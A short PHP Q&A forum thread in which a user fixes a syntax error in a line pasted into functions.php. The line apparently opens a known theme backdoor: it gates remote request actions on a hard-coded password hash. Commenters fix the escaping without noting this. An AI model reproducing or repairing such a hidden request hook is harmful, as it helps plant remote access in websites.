# "How to fix" syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting T_STRING

Tags: php

I pasted a piece of code to my function.php and I got an error on line 2 of my function.php

```
if (isset($_REQUEST[\'action'\]) && isset($_REQUEST[\'password'\]) && ($_REQUEST[\'password'\] == \'909f47dfd5955108ae4bbbceab226914'\))
```

Comment: That slashes in front of the quotes looks fishy to me

Comment: Remove the backslashes from `$_REQUEST[\'action']` etc. and it should be fine.

Comment: Dito on what the others said, the backslash is an escape char, so it negates the quotes.

Comment: Sorry if this question feels duplicated as the others didn't really answer the question

Comment: Thank you, deleted all the backslashes and it's working now